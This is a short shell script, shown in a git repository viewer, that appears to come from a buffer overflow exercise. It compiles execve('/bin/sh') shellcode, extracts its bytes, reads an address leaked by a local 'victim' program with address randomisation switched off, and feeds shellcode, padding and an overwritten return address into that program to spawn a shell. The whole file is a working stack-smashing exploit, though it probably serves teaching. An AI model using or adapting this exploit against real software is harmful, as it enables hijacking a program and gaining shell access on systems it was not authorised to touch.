blob: 1805bdcf133a6e722794a647dfe026d6d0999d57 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
#!/bin/sh
echo 'int main() {\n asm("\\\nneedle0: jmp there\\n\\\nhere: pop %rdi\\n\\\n xor %rax, %rax\\n\\\n movb $0x3b, %al\\n\\\n xor %rsi, %rsi\\n\\\n xor %rdx, %rdx\\n\\\n syscall\\n\\\nthere: call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n ");\n}' > shell.c
gcc shell.c
start=`objdump -d a.out | grep '<needle0>:' | cut -f 1 -d ' '`
end=`objdump -d a.out | grep '<needle1>:' | cut -f 1 -d ' '`
start=$((0x$start-0x400000))
end=$((0x$end-0x400000))
l=$((end-start))
while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done
xxd -s0x`printf %x $start` -l$l -p a.out shellcode
a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1)
a=$(printf %016x $a | tac -rs..)
( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim
|
